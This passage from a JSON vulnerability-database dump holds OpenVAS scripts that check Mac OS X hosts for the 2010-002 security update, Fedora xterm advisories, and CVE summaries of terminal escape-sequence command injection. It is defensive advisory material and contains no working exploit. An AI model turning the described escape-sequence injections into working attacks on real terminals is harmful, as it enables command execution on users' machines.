useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.102039\");\n script_version(\"$Revision: 14307 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 11:09:27 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-12 14:48:44 +0200 (Wed, 12 May 2010)\");\n script_cve_id(\"CVE-2010-0056\", \"CVE-2009-2801\", \"CVE-2010-0057\", \"CVE-2010-0533\", \"CVE-2009-3095\",\n \"CVE-2010-0058\", \"CVE-2010-0059\", \"CVE-2010-0060\", \"CVE-2010-0062\", \"CVE-2010-0063\",\n \"CVE-2010-0393\", \"CVE-2009-2417\", \"CVE-2009-0037\", \"CVE-2009-2632\", \"CVE-2009-0688\",\n \"CVE-2010-0064\", \"CVE-2010-0537\", \"CVE-2010-0065\", \"CVE-2010-0497\", \"CVE-2010-0498\",\n \"CVE-2010-0535\", \"CVE-2010-0500\", \"CVE-2010-0524\", \"CVE-2010-0501\", \"CVE-2006-1329\",\n \"CVE-2010-0502\", \"CVE-2010-0503\", \"CVE-2010-0504\", \"CVE-2010-0505\", \"CVE-2010-0041\",\n \"CVE-2010-0042\", \"CVE-2010-0043\", \"CVE-2010-0506\", \"CVE-2010-0507\", \"CVE-2009-0689\",\n \"CVE-2010-0508\", \"CVE-2010-0525\", \"CVE-2008-0564\", \"CVE-2008-4456\", \"CVE-2008-7247\",\n \"CVE-2009-2446\", \"CVE-2009-4019\", \"CVE-2009-4030\", \"CVE-2010-0509\", \"CVE-2010-0510\",\n \"CVE-2008-5302\", \"CVE-2008-5303\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-3559\",\n \"CVE-2009-4017\", \"CVE-2009-4142\", \"CVE-2009-4143\", \"CVE-2010-0511\", \"CVE-2010-0512\",\n \"CVE-2010-0513\", \"CVE-2010-0514\", \"CVE-2010-0515\", \"CVE-2010-0516\", \"CVE-2010-0517\",\n \"CVE-2010-0518\", \"CVE-2010-0519\", \"CVE-2010-0520\", \"CVE-2010-0526\", \"CVE-2009-2422\",\n \"CVE-2009-3009\", \"CVE-2009-4214\", \"CVE-2009-1904\", \"CVE-2010-0521\", \"CVE-2010-0522\",\n \"CVE-2009-2906\", \"CVE-2009-0580\", \"CVE-2009-0033\", \"CVE-2009-0783\", \"CVE-2008-5515\",\n \"CVE-2009-0781\", \"CVE-2009-2901\", \"CVE-2009-2902\", \"CVE-2009-2693\", \"CVE-2008-0888\",\n \"CVE-2008-2712\", \"CVE-2008-4101\", \"CVE-2009-0316\", \"CVE-2010-0523\", \"CVE-2010-0534\",\n \"CVE-2009-2042\", \"CVE-2003-0063\", \"CVE-2010-0055\");\n script_name(\"Mac OS X 10.6.3 Update / Mac OS X Security Update 2010-002\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.[56]\\.\");\n\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT4077\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing Mac OS X 10.6.3 Update / Mac OS X Security Update 2010-002.\");\n\n script_tag(name:\"affected\", value:\"One or more of the following components are affected:\n\n AppKit\n\n Application Firewall\n\n AFP Server\n\n Apache\n\n ClamAV\n\n CoreAudio\n\n CoreMedia\n\n CoreTypes\n\n CUPS\n\n curl\n\n Cyrus IMAP\n\n Cyrus SASL\n\n DesktopServices\n\n Disk Images\n\n Directory Services\n\n Dovecot\n\n Event Monitor\n\n FreeRADIUS\n\n FTP Server\n\n iChat Server\n\n ImageIO\n\n Image RAW\n\n Libsystem\n\n Mail\n\n Mailman\n\n MySQL\n\n OS Services\n\n Password Server\n\n perl\n\n PHP\n\n Podcast Producer\n\n Preferences\n\n PS Normalizer\n\n QuickTime\n\n Ruby\n\n Server Admin\n\n SMB\n\n Tomcat\n\n unzip\n\n vim\n\n Wiki Server\n\n X11\n\n xar\");\n\n script_tag(name:\"solution\", value:\"Update your Mac OS X operating system. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\ninclude(\"version_func.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver || ssh_osx_ver !~ \"^10\\.[56]\\.\") exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.5.8\",\"Mac OS X Server 10.5.8\",\"Mac OS X 10.6.2\",\"Mac OS X Server 10.6.2\");\n\nif (rlsnotsupported(rls:ssh_osx_rls, list:pkg_for_ver)) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.8\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X 10.5.8\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n else if((ssh_osx_ver == osx_ver(ver:\"Mac OS X 10.5.8\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2010.002\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.8\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X Server 10.5.8\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n else if((ssh_osx_ver == osx_ver(ver:\"Mac OS X Server 10.5.8\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2010.002\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.6.2\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:\"10.6.3\")) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0); }\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.6.2\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:\"10.6.3\")) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0); }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:54", "description": "The remote host is missing Mac OS X 10.6.3 Update / Mac OS X Security Update 2010-002.\n One or more of the following components are affected:\n\n AppKit\n Application Firewall\n AFP Server\n Apache\n ClamAV\n CoreAudio\n CoreMedia\n CoreTypes\n CUPS\n curl\n Cyrus IMAP\n Cyrus SASL\n DesktopServices\n Disk Images\n Directory Services\n Dovecot\n Event Monitor\n FreeRADIUS\n FTP Server\n iChat Server\n ImageIO\n Image RAW\n Libsystem\n Mail\n Mailman\n MySQL\n OS Services\n Password Server\n perl\n PHP\n Podcast Producer\n Preferences\n PS Normalizer\n QuickTime\n Ruby\n Server Admin\n SMB\n Tomcat\n unzip\n vim\n Wiki Server\n X11\n xar", "cvss3": {}, "published": "2010-05-12T00:00:00", "type": "openvas", "title": "Mac OS X 10.6.3 Update / Mac OS X Security Update 2010-002", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0060", "CVE-2010-0517", "CVE-2010-0505", "CVE-2009-2906", "CVE-2008-0564", "CVE-2010-0041", "CVE-2009-2446", "CVE-2009-3558", "CVE-2009-2417", "CVE-2008-0888", "CVE-2010-0498", "CVE-2010-0506", "CVE-2009-2632", "CVE-2008-5302", "CVE-2009-0033", "CVE-2008-4456", "CVE-2010-0515", "CVE-2010-0500", "CVE-2009-1904", "CVE-2010-0537", "CVE-2009-4030", "CVE-2010-0522", "CVE-2008-5303", "CVE-2010-0520", "CVE-2010-0504", "CVE-2010-0514", "CVE-2009-2693", "CVE-2010-0519", "CVE-2009-2042", "CVE-2010-0510", "CVE-2010-0511", "CVE-2009-0580", "CVE-2010-0512", "CVE-2009-0781", "CVE-2009-4214", "CVE-2008-5515", "CVE-2003-0063", "CVE-2009-2801", "CVE-2010-0055", "CVE-2009-0688", "CVE-2010-0523", "CVE-2010-0497", "CVE-2010-0503", "CVE-2010-0056", "CVE-2010-0533", "CVE-2010-0501", "CVE-2009-0316", "CVE-2009-3009", "CVE-2010-0062", "CVE-2009-4142", "CVE-2010-0507", "CVE-2010-0508", "CVE-2009-0689", "CVE-2009-0037", "CVE-2010-0525", "CVE-2009-2901", "CVE-2008-4101", "CVE-2010-0063", "CVE-2010-0065", "CVE-2010-0509", "CVE-2009-2422", "CVE-2009-3095", "CVE-2010-0058", "CVE-2010-0059", "CVE-2009-4017", "CVE-2010-0535", "CVE-2009-0783", "CVE-2009-4143", "CVE-2010-0043", "CVE-2010-0518", "CVE-2010-0526", "CVE-2010-0516", "CVE-2010-0513", "CVE-2009-3559", "CVE-2010-0502", "CVE-2008-7247", "CVE-2006-1329", "CVE-2009-2902", "CVE-2010-0057", "CVE-2008-2712", "CVE-2009-4019", "CVE-2010-0521", "CVE-2010-0393", "CVE-2010-0524", "CVE-2010-0064", "CVE-2010-0534", "CVE-2010-0042", "CVE-2009-3557"], "modified": "2017-02-22T00:00:00", "id": "OPENVAS:102039", "href": "http://plugins.openvas.org/nasl.php?oid=102039", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n#\n# Mac OS X 10.6.3 Update / Mac OS X Security Update 2010-002\n#\n# LSS-NVT-2010-028\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\ntag_solution = \"Update your Mac OS X operating system.\n\n For more information see:\n http://support.apple.com/kb/HT4077\";\n\ntag_summary = \"The remote host is missing Mac OS X 10.6.3 Update / Mac OS X Security Update 2010-002.\n One or more of the following components are affected:\n\n AppKit\n Application Firewall\n AFP Server\n Apache\n ClamAV\n CoreAudio\n CoreMedia\n CoreTypes\n CUPS\n curl\n Cyrus IMAP\n Cyrus SASL\n DesktopServices\n Disk Images\n Directory Services\n Dovecot\n Event Monitor\n FreeRADIUS\n FTP Server\n iChat Server\n ImageIO\n Image RAW\n Libsystem\n Mail\n Mailman\n MySQL\n OS Services\n Password Server\n perl\n PHP\n Podcast Producer\n Preferences\n PS Normalizer\n QuickTime\n Ruby\n Server Admin\n SMB\n Tomcat\n unzip\n vim\n Wiki Server\n X11\n xar\";\n\n\nif(description)\n{\n script_id(102039);\n script_version(\"$Revision: 5394 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-22 10:22:42 +0100 (Wed, 22 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-12 14:48:44 +0200 (Wed, 12 May 2010)\");\n script_cve_id(\"CVE-2010-0056\",\"CVE-2009-2801\",\"CVE-2010-0057\",\"CVE-2010-0533\",\"CVE-2009-3095\",\"CVE-2010-0058\",\"CVE-2010-0059\",\"CVE-2010-0060\",\"CVE-2010-0062\",\"CVE-2010-0063\",\"CVE-2010-0393\",\"CVE-2009-2417\",\"CVE-2009-0037\",\"CVE-2009-2632\",\"CVE-2009-0688\",\"CVE-2010-0064\",\"CVE-2010-0537\",\"CVE-2010-0065\",\"CVE-2010-0497\",\"CVE-2010-0498\",\"CVE-2010-0535\",\"CVE-2010-0500\",\"CVE-2010-0524\",\"CVE-2010-0501\",\"CVE-2006-1329\",\"CVE-2010-0502\",\"CVE-2010-0503\",\"CVE-2010-0504\",\"CVE-2010-0505\",\"CVE-2010-0041\",\"CVE-2010-0042\",\"CVE-2010-0043\",\"CVE-2010-0506\",\"CVE-2010-0507\",\"CVE-2009-0689\",\"CVE-2010-0508\",\"CVE-2010-0525\",\"CVE-2008-0564\",\"CVE-2008-4456\",\"CVE-2008-7247\",\"CVE-2009-2446\",\"CVE-2009-4019\",\"CVE-2009-4030\",\"CVE-2010-0509\",\"CVE-2010-0510\",\"CVE-2008-5302\",\"CVE-2008-5303\",\"CVE-2009-3557\",\"CVE-2009-3558\",\"CVE-2009-3559\",\"CVE-2009-4017\",\"CVE-2009-4142\",\"CVE-2009-4143\",\"CVE-2010-0511\",\"CVE-2010-0512\",\"CVE-2010-0513\",\"CVE-2010-0514\",\"CVE-2010-0515\",\"CVE-2010-0516\",\"CVE-2010-0517\",\"CVE-2010-0518\",\"CVE-2010-0519\",\"CVE-2010-0520\",\"CVE-2010-0526\",\"CVE-2009-2422\",\"CVE-2009-3009\",\"CVE-2009-4214\",\"CVE-2009-1904\",\"CVE-2010-0521\",\"CVE-2010-0522\",\"CVE-2009-2906\",\"CVE-2009-0580\",\"CVE-2009-0033\",\"CVE-2009-0783\",\"CVE-2008-5515\",\"CVE-2009-0781\",\"CVE-2009-2901\",\"CVE-2009-2902\",\"CVE-2009-2693\",\"CVE-2008-0888\",\"CVE-2008-2712\",\"CVE-2008-4101\",\"CVE-2009-0316\",\"CVE-2010-0523\",\"CVE-2010-0534\",\"CVE-2009-2042\",\"CVE-2003-0063\",\"CVE-2010-0055\");\n script_name(\"Mac OS X 10.6.3 Update / Mac OS X Security Update 2010-002\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_require_ports(\"Services/ssh\", 22);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\",\"ssh/login/osx_version\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\ninclude(\"version_func.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver) exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.5.8\",\"Mac OS X Server 10.5.8\",\"Mac OS X 10.6.2\",\"Mac OS X Server 10.6.2\");\n\nif (rlsnotsupported(rls:ssh_osx_rls, list:pkg_for_ver)) { security_message(0); exit(0);}\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.8\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X 10.5.8\"))) { security_message(0); exit(0);}\n else if ((ssh_osx_ver==osx_ver(ver:\"Mac OS X 10.5.8\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2010.002\"))) { security_message(0); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.8\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X Server 10.5.8\"))) { security_message(0); exit(0);}\n else if ((ssh_osx_ver==osx_ver(ver:\"Mac OS X Server 10.5.8\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2010.002\"))) { security_message(0); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.6.2\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:\"10.6.3\")) { security_message(0); exit(0); }\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.6.2\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:\"10.6.3\")) { security_message(0); exit(0); }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "description": "The xterm program is a terminal emulator for the X Window System. It provides DEC VT102 and Tektronix 4014 compatible terminals for programs that can't use the window system directly. ", "cvss3": {}, "published": "2009-01-07T09:25:00", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: xterm-238-1.fc8", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071", "CVE-2008-2383"], "modified": "2009-01-07T09:25:00", "id": "FEDORA:9286A208DEA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PLCJBHEBV2DEZ5I6Y35D5J6XWBNGRZK3/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The xterm program is a terminal emulator for the X Window System. It provides DEC VT102 and Tektronix 4014 compatible terminals for programs that can't use the window system directly. ", "cvss3": {}, "published": "2009-01-07T09:12:14", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: xterm-238-1.fc9", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071", "CVE-2008-2383"], "modified": "2009-01-07T09:12:14", "id": "FEDORA:84D14208457", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/VY2ISGI4V4JI6JJPU2ZT3DAU4OTWVSJA/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The xterm program is a terminal emulator for the X Window System. It provides DEC VT102 and Tektronix 4014 compatible terminals for programs that can't use the window system directly. ", "cvss3": {}, "published": "2009-01-07T09:16:50", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: xterm-238-1.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071", "CVE-2008-2383"], "modified": "2009-01-07T09:16:50", "id": "FEDORA:DD06D208DE9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EYPLKJWYEA4N4A4NK7662WN4ATRYV5AO/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-11-22T05:15:55", "description": "CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF (aka \\n) characters surrounding a command name within a Device Control Request Status String (DECRQSS) escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071.", "cvss3": {}, "published": "2009-01-02T18:11:00", "type": "prion", "title": "Crlf injection", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071", "CVE-2008-2383"], "modified": "2023-11-07T02:02:00", "id": "PRION:CVE-2008-2383", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2008-2383", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T03:58:30", "description": "Terminology 0.7.0 allows remote attackers to execute arbitrary commands via escape sequences that modify the window title and then are written to the terminal, a similar issue to CVE-2003-0063.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-23T21:59:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063", "CVE-2015-8971"], "modified": "2020-02-24T19:44:00", "id": "PRION:CVE-2015-8971", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-8971", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T04:57:16", "description": "The vte_sequence_handler_window_manipulation function in vteseq.c in libvte (aka libvte9) in VTE 0.25.1 and earlier, as used in gnome-terminal, does not properly handle escape sequences, which allows remote attackers to execute arbitrary commands or obtain potentially sensitive information via a (1) window title or (2) icon title sequence. NOTE: this issue exists because of a CVE-2003-0070 regression.", "cvss3": {}, "published": "2010-08-05T18:17:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0070", "CVE-2010-2713"], "modified": "2010-09-09T05:43:00", "id": "PRION:CVE-2010-2713", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2010-2713", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-18T22:57:05", "description": "Mutagen provides real-time file synchronization and flexible network forwarding for developers. Prior to versions 0.16.6 and 0.17.1 in `mutagen` and prior to version 0.17.1 in `mutagen-compose`, Mutagen `list` and `monitor` commands are susceptible to control characters that could be provided by remote endpoints. This could cause terminal corruption, either intentional or unintentional, if these characters were present in error messages or file paths/names. This could be used as an attack vector if synchronizing with an untrusted remote endpoint, synchronizing files not under control of the user, or forwarding to/from an untrusted remote endpoint. On very old systems with terminals susceptible to issues such as CVE-2003-0069, the issue could theoretically cause code execution. The problem has been patched in Mutagen v0.16.6 and v0.17.1. Earlier versions of Mutagen are no longer supported and will not be patched. Versions of Mutagen after v0.18.0 will also have the patch merged. As a workaround, avoiding synchronization of untrusted files or interaction with untrusted remote endpoints should mitigate any risk.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-08T18:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0069", "CVE-2023-30844"], "modified": "2023-05-15T18:07:00", "id": "PRION:CVE-2023-30844", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2023-30844", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-11-28T15:54:05", "description": "CRLF injection vulnerability in xterm allows user-assisted attackers to\nexecute arbitrary commands via LF (aka \\n) characters surrounding a command\nname within a Device Control Request Status String (DECRQSS) escape\nsequence in a text file, a related issue to CVE-2003-0063 and\nCVE-2003-0071.", "cvss3": {}, "published": "2009-01-02T00:00:00", "type": "ubuntucve", "title": "CVE-2008-2383", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071", "CVE-2008-2383"], "modified": "2009-01-02T00:00:00", "id": "UB:CVE-2008-2383", "href": "https://ubuntu.com/security/CVE-2008-2383", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T16:09:16", "description": "", "cvss3": {}, "published": "2003-03-03T00:00:00", "type": "ubuntucve", "title": "CVE-2003-0078", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0078"], "modified": "2003-03-03T00:00:00", "id": "UB:CVE-2003-0078", "href": "https://ubuntu.com/security/CVE-2003-0078", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-28T16:09:17", "description": "", "cvss3": {}, "published": "2003-03-03T00:00:00", "type": "ubuntucve", "title": "CVE-2003-0071", "bulletinFamily": "info", "cvss2": {"severity": "LOW", 